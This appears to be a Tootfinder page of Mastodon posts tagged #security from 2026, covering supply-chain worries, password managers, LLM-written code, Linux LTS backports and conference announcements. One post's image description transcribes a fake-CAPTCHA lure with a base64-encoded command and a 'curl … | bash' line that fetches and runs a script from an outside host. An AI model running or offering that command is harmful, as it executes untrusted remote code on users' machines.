Tootfinder

Opt-in global Mastodon full text search. Join the index!

@kubikpixel@chaos.social
2026-04-20 05:05:46

«Security: This library has not undergone any third-party security audit. Usage is at own risk.»
If something like this is written on a code library, the confidence in your security is much higher than if commercial blenders want to advertise absolute IT security and there are the safest — especially when the commercial goals still list ratings in this way.
#security

@publicvoit@graz.social
2026-05-20 19:16:53

After reading about today's #Github #security incident, exposing thousands of internal repositories, I'd like to remind you of:
Read That Before You Trust Anything by #Microsoft Once Again

@hex@kolektiva.social
2026-05-20 10:01:28

I'm going to deviate a bit from my normal audience and focus in on #tech (especially #Security folks). I came across the practice from public health and emergency management and brought it into work. They seemed to have never heard of it. I'm curious how common my experience is. (Please boost for visibility)
Have you ever used table top exercises in your work (such as, to verify a runbook would work as expected)?
Yes, and I work in tech
No, and I work in tech
Yes, and I don't work in tech
No, and I don't work in tech

@chrysn@chaos.social
2026-05-18 07:20:02

Legislation cares a lot about information #security these days. When do we laws that keep companies from tainting security's public reputation by demonstrably abusing it for their own commercial interest against the interests of consumers?
Just one example: Bank uses proprietary hardware over #WebAuthn

@frankel@mastodon.top
2026-04-14 17:23:25

#OpenSource #security at Astral
astral.sh/blog/open-source-sec

@almad@fosstodon.org
2026-04-19 21:49:48

Oh wow. I guess it's "lazy and smart" in a way (and only gives you three attempts at loading, then 401)
#security

A screenshot of a website verification page for portal.secure-access.com. At the top, the URL "portal.secure-access.com" is displayed above a badge that reads "✓ PROTECTED BY SECUREVERIFY". A central white card contains the heading "Just One Sec..." and the text "We're verifying your connection to keep this site secure." The card features badges for "✓ 256-b 256-bit SSL", "☑ Verified", and "Ⓤ Secure", plus a green-outlined box that reads "✓ I'm not a robot" and "Click to verify — code will be c…
A snippet of code on a black background, appearing as if from a terminal window. The first line of text is: echo "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZ "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZW4uZGlnaXRhbC9zY3JpcHQu2gnIHwgYmFzaA==" | | base64 -d. The second line of text is: curl -s 'https://wi5msaren.digit 'https://wi5msaren.digital/script.sh' | bash%, followed by a small black square.
@mgorny@social.treehouse.systems
2026-04-15 05:00:43

The state of #security these days: #Python #virtualenv package now includes SHA256 sums of their bundled wheels, declaring that it protects against "supply-chain compromise". Because obviously there are so many attack vectors that permit you to alter a .whl file but not the .py file in the same directory.
No, I'm not saying verifying checksum makes no sense, because indeed it can save some pain if fs is damaged somehow. However, calling this a "security" feature is a misnomer at best, and openly giving people false sense of security at worst.

@geant@mstdn.social
2026-03-13 12:42:49

Have you seen the GÉANT #SecurityDays 2026 workshop programme yet?
This year features 9 hands-on workshops across 3 days, covering everything from threat hunting and crisis simulations to open-source tooling and #DDoS defence.
All workshop participants will also receive a PCD certificate re…

GÉANT Security Days 2026 workshop: Threat Hunting Workshop on 7 April 2026 at 10:00
GÉANT Security Days 2026 workshop: Capture the Flag Challenge on 8 April 2026 at 11:00
GÉANT Security Days 2026 workshop: PAW Exercise on 9 April 2026 at 13:30
GÉANT Security Days 2026 workshop: You can earn a PCD Certificate
@matthiasott@mastodon.social
2026-05-06 07:18:19

#Webmention for Craft v1.3.0 is out 🎉 – first in a short series of #security releases. 🔒
Fixes a stored XSS vulnerability in author/entry URLs, adds per-IP rate limits, and failure-backoff to harden the public endpoint against abuse.
Upgrade recommended!

@eingfoan@infosec.exchange
2026-03-16 19:02:42

Is there a guide how to integrate #SIEM systems and #VideoSuvailance systems vor General alarming systems for having physical and Cyber #security in one Palace (if company is not that large ...…

@trezzer@social.linux.pizza
2026-05-15 14:47:50

OK. With Bitwarden acting every bit the American company it is, are there any drop-in replacements out there? Preferably standalone rather than part of a package. #security #passwordmanager

@cyrevolt@mastodon.social
2026-04-12 14:49:28

On the #security issue with #AI detectors
For proper vuln research and disclosure, you need 3 parts:
1. a valid exploit, provable
2. an explanation of how it works
3. a solution to fix it and roll out an upgrade
Often enough, when the first part is done, people are like "…

@UP8@mastodon.social
2026-03-09 16:34:07

🤦🏿‍♀️ Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
#security

@mgorny@social.treehouse.systems
2026-03-19 12:23:26

Proper #security nightmare time.
#LMDB is a database that's designed to operate on trusted input. Upstream has historically rejected all bug reports regarding problems with malformed input.
Py-LMDB project provides #Python bindings to LMDB that are normally built against bundled LMDB. Someone recently started mass-filing "untrusted input" vulnerabilities against py-lmdb, and py-lmdb started #slop - coding fixes to their bundled LMDB. Of course, nobody even bothered reporting most of these bugs upstream, and the one that I've seen reported was rejected as "don't do that".
Py-LMDB supports building against system LMDB, and #Gentoo was doing that so far. However, now we are facing a problem: system LMDB operates under the assumption that it is working on trusted input, while py-lmdb (and its bundled LMDB) operates under the assumption that it may be working with untrusted input. The guarantees no longer align.
If we continue to use system LMDB (and skip all the added slop tests that literally cause Python to crash), then Gentoo's py-lmdb package will now have different input expectations than upstream py-lmdb. And of course we can't just remove that crap because someone added exactly one package (TorchVision, i.e. part of the plagiarism machine suite) depending on it.
bugs.gentoo.org/971352

@kaiengert@mastodon.social
2026-03-25 14:50:34

Please help with testing a new
#Thunderbird #Security feature: Unobtrusive Signatures, a novel mechanism for digitally signing email, currently implemented for #OpenPGP.
It avoids the u…

@frankstohl@mastodon.social
2026-04-27 09:40:23

Wenn Politiker auf die billigste Phishing-Attacke reinfallen, was ist dann die Gegenmaßnahme? #Phishing #Politik #Security

@vague@social.linux.pizza
2026-03-27 15:38:25

I understand #security is important and all, but getting logged out from #Teams and email frequently because MS thinks the auth cookie needs to be renewed is mighty irritating to say the least. To say more, I swear loudly every time I have to login again. Just fucking let me be.

@mgorny@social.treehouse.systems
2026-04-08 13:30:38

Fun post pointed out by Werner Koch on the GPG "post-quantum defaults" thread:
#cryptography #QuantumCryptography #security

@geant@mstdn.social
2026-03-23 12:20:28

The final keynote highlight from the GÉANT #SecurityDays 2026 this April.
Alexandre Dulaunoy, Head of CIRCL, Luxembourg's national CSIRT — on how 15 years of open-source security development has shown that sharing code, knowledge and intelligence builds networks of trust between defenders.
If you haven't got your ticket yet, this week is your last chance. Secure your place …

GÉANT Security Days 2026 keynote speaker: Alexandre Dulaunoy
@usul@piaille.fr
2026-02-23 11:40:56

If the browser maker you are using is able to pull off something similar than what's described in this video, then it's a safe browser to use.
youtube.com/watch?app=desktop&

@mgorny@social.treehouse.systems
2026-05-07 05:17:44

Everyone loves jeering at vibecoded #GitHub being down all the time. Yet for some reason people still neglect to question making #Microsoft the primary guarantor of their software's supply chain #security. And the whole attestation nonsense that doesn't really protect against the most likely attack vectors.

@geant@mstdn.social
2026-03-23 12:14:58

The GÉANT #SecurityDays 2026 programme is live and we're highlighting the keynotes you won't want to miss.
First up is Frank Rieger!
Hacker, author and internet activist — on how agentic LLMs are changing the IT security landscape, and why mastering the fundamentals of network control matters more than ever.
Learn more & secure your place 👉

GÉANT Security Days 2026 keynote speaker banner: Frank Rieger
@geant@mstdn.social
2026-03-23 12:18:20

Another keynote not to miss at the GÉANT #SecurityDays 2026 this April.
Nancy Beers, seasoned gamification expert and owner of Sanne Cyber and Happy Game Changers — on why playfulness is a scientifically-backed tool for security innovation, learning, and flexibility.
Check the full programme 👉

GÉANT Security Days 2026 keynote speaker: Nancy Beers
@chris@mstdn.chrisalemany.ca
2026-02-25 17:28:58

Wow, so 1Password has increased its already expensive services. I have only used it for work/volunteer related stuff. I've been using Apple's Keychain and now Passwords App for years.
If you're on a Mac/iOS system and want to switch, 9to5 has a good run down on how to export your 1Password database and bring it into Passwords.
if you've never used a Password Manager, you really really should.
#Security #Passwords #Apple #1Password #PasswordManager
9to5mac.com/2026/02/25/heres-h

@mgorny@social.treehouse.systems
2026-03-16 04:40:34

Modern use of LLMs often involves giving them access to the local system: to read and write your project files, and to execute arbitrary commands, often unsupervised. So aren't people worried about a harness just doing what a remote #LLM tells it to do?
I think a statement I've heard lately summarizes the mindset well. It went something along the lines "I can't give you 100% guarantee, but I've noticed that LLMs are very good at following instructions, and they're getting better and better, so I don't worry about that anymore".
Like, it is completely fine to introduce a humongous security hole, because the probability that a model will *accidentally* do something horrible is decreasing.
#AI #NoAI #NoLLM #security

@frankstohl@mastodon.social
2026-04-09 17:38:15

Macht Microsoft WireGuard kaputt? #vpn #wireguard #security #windows

@geant@mstdn.social
2026-03-23 12:16:32

Another keynote not to miss at the GÉANT #SecurityDays 2026 this April.
Valerie Aurora, open-source software engineer and co-founder of the Amsterdam Internet Resiliency Club — on why internet connectivity in Europe is more fragile than we think, and how communities can prepare together.
Secure your place 👉

GÉANT Security Days 2026 keynote speaker banner: Valerie Aurora
@mgorny@social.treehouse.systems
2026-05-05 05:25:48

#Python #cryptography library (yes, the one that criticizes everything and everyone) is now vibecoded. Our future is truly bright!
Noticed because apparently "Claude" wrote a test that OOM-ed my system. But hey, #RustLang protects against memory errors, so it's fine to vibecode your security critical components.
#security #AI #LLM #NoAI #NoLLM

@mgorny@social.treehouse.systems
2026-04-30 05:38:38

So you read about #CopyFail, and are like… owww, shit. But then you see that it was responsibly disclosed after being fixed in main, we had releases since, they went stable in #Gentoo (over other #security fixes), so we should be good, right?
Except that it turns out that after it has been fixed in mainline, nobody bothered actually backporting the fix to all the LTS branches. And it doesn't apply cleanly (#Gentoo #Linux

@mgorny@social.treehouse.systems
2026-05-11 04:49:30

Tech companies seem to be running a cycle:
1. They don't realize how much they're relying on volunteer-maintained projects.
2. Something bad happens and they suddenly decide they need to support this critical infrastructure, often by hiring some people behind it and making its maintenance part of their dayjob.
3. They realize they could save money by exploiting volunteers to maintain these #OpenSource projects. They lay workers off or move them to other projects.
4. Go to 1.
Except now they're trying to replace workers with slop machines, deskill everyone and basically they're not only poisoning the well, but killing the whole water cycle. And they're realizing that they just gave the bad people a tool that can quickly find just how vulnerable their critical infrastructure is.
Really appreciate the long-term thinking there.
#FreeSoftware #FLOSS #TechBros #AI #LLM #NoAI #NoLLM #Linux #security

@mgorny@social.treehouse.systems
2026-05-02 05:55:56

Greg Kroah-Hartman: "If you look there are thousands of unfixed CVEs in the older LTS kernels right now, and if distros or users that rely on those older branches wish to see those resolved, they need to provide working backports to us to apply, as our first attempt did not work (which is why they are unfixed in those branches.)"
Really asking for a "Pray tell us", given that nobody actually bothered disclosing the problem to downstreams and that the commit message was hiding it.
Either way, apparently the great LLM-backed patch backporting process that #NVidia is so proud of doesn't really work. Upstream doesn't really care about #LTS branches, and they should be considered insecure by default.
#Gentoo #Linux #CopyFail #security